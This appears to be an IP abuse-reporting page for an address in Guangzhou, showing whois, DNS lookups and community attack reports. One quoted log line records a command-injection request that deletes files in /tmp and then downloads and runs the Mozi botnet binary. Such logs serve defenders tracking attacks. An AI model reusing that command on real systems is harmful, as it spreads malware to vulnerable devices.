Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: Guangzhou

Region: Guangdong

Country: China

Internet Service Provider: China Unicom

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
IP Type Details Datetime
27.47.42.22 attack
27.47.42.22 - - [05/Aug/2022:18:08:19 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 301 941 "-" "Hello, world"
2022-08-06 00:48:35
Whois info:
% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to '27.47.0.0 - 27.47.63.255'

% Abuse contact for '27.47.0.0 - 27.47.63.255' is 'zhaoyz3@chinaunicom.cn'

inetnum:        27.47.0.0 - 27.47.63.255
netname:        GuangZhou-unicom
descr:          United-Communications-Network-Technology-Co-Ltd, GuangZhou
country:        CN
admin-c:        CG272-AP
tech-c:         CG272-AP
abuse-c:        AC1718-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-CNCGROUP-GD
mnt-irt:        IRT-CU-CN
last-modified:  2025-01-22T13:09:22Z
source:         APNIC

irt:            IRT-CU-CN
address:        No.21,Financial Street
address:        Beijing,100033
address:        P.R.China
e-mail:         zhaoyz3@chinaunicom.cn
abuse-mailbox:  zhaoyz3@chinaunicom.cn
admin-c:        CH1302-AP
tech-c:         CH1302-AP
auth:           # Filtered
remarks:        zhaoyz3@chinaunicom.cn was validated on 2025-10-17
mnt-by:         MAINT-CNCGROUP
last-modified:  2025-11-18T00:26:20Z
source:         APNIC

role:           ABUSE CUCN
country:        ZZ
address:        No.21,Financial Street
address:        Beijing,100033
address:        P.R.China
phone:          +000000000
e-mail:         zhaoyz3@chinaunicom.cn
admin-c:        CH1302-AP
tech-c:         CH1302-AP
nic-hdl:        AC1718-AP
remarks:        Generated from irt object IRT-CU-CN
remarks:        zhaoyz3@chinaunicom.cn was validated on 2025-10-17
abuse-mailbox:  zhaoyz3@chinaunicom.cn
mnt-by:         APNIC-ABUSE
last-modified:  2025-10-17T02:26:56Z
source:         APNIC

role:           CNCGROUP GD
nic-hdl:        CG272-AP
e-mail:         gdipnoc@chinaunicom.cn
address:        XinShiKong Plaza,No 666 Huangpu Rd. Guangzhou 510627,China
phone:          +86-20-22214226
fax-no:         +86-20-22214228
admin-c:        RP181-AP
tech-c:         RP181-AP
country:        CN
mnt-by:         MAINT-CNCGROUP-GD
last-modified:  2009-04-14T08:33:40Z
source:         APNIC

% Information related to '27.47.0.0/16AS17622'

route:          27.47.0.0/16
descr:          China Unicom Guangdong Province Network
country:        CN
origin:         AS17622
mnt-by:         MAINT-CNCGROUP-RR
last-modified:  2011-05-11T01:22:02Z
source:         APNIC

% This query was served by the APNIC Whois Service version 1.88.47 (WHOIS-AU4)
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 27.47.42.237
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 39771
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;27.47.42.237.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2026031300 1800 900 604800 86400

;; Query time: 5 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Mar 13 15:09:11 CST 2026
;; MSG SIZE  rcvd: 105
Host info
Host 237.42.47.27.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 237.42.47.27.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
103.82.243.39 attackbots
This IP has been usaged by attack using exploits
2019-07-03 03:23:04
201.211.126.189 attack
445/tcp
[2019-07-02]1pkt
2019-07-03 03:28:47
189.153.239.220 attackspambots
Jan 23 19:54:02 motanud sshd\[2346\]: Invalid user walter from 189.153.239.220 port 50132
Jan 23 19:54:02 motanud sshd\[2346\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=189.153.239.220
Jan 23 19:54:03 motanud sshd\[2346\]: Failed password for invalid user walter from 189.153.239.220 port 50132 ssh2
2019-07-03 03:09:58
125.64.94.211 attackbotsspam
Scanning (more than 2 packets) random ports - tries to find possible vulnerable services
2019-07-03 03:46:57
171.243.34.221 attack
445/tcp
[2019-07-02]1pkt
2019-07-03 03:32:20
77.40.62.212 attackbots
445/tcp
[2019-07-02]1pkt
2019-07-03 03:52:11
198.211.118.157 attackbots
$f2bV_matches
2019-07-03 03:35:16
95.132.252.185 attack
23/tcp
[2019-07-02]1pkt
2019-07-03 03:18:19
185.229.190.140 attackbots
Es un hacker de facebook
2019-07-03 03:50:43
139.0.4.194 attack
445/tcp
[2019-07-02]1pkt
2019-07-03 03:48:40
170.79.201.9 attackspambots
23/tcp
[2019-07-02]1pkt
2019-07-03 03:23:52
120.52.152.16 attackspam
02.07.2019 19:29:59 Connection to port 3283 blocked by firewall
2019-07-03 03:42:48
128.199.212.232 attackspambots
Automatic report - Web App Attack
2019-07-03 03:22:16
114.42.71.174 attackbots
37215/tcp
[2019-07-02]1pkt
2019-07-03 03:11:47
113.204.16.94 attackbotsspam
Jul  2 20:26:22 tux-35-217 sshd\[28109\]: Invalid user kuai from 113.204.16.94 port 42783
Jul  2 20:26:22 tux-35-217 sshd\[28109\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=113.204.16.94
Jul  2 20:26:25 tux-35-217 sshd\[28109\]: Failed password for invalid user kuai from 113.204.16.94 port 42783 ssh2
Jul  2 20:29:04 tux-35-217 sshd\[28117\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=113.204.16.94  user=mail
...
2019-07-03 03:40:12

Recently Reported IPs

223.104.124.112 61.166.210.53 221.13.93.113 118.212.121.58
15.9.0.167 3.254.70.213 103.96.1.160 10.50.0.62
225.67.122.218 27.47.42.85 212.135.214.5 61.48.133.81
34.38.53.187 38.55.172.148 125.71.95.85 20.87.107.130
163.176.138.17 8.136.203.46 52.200.238.15 52.30.206.37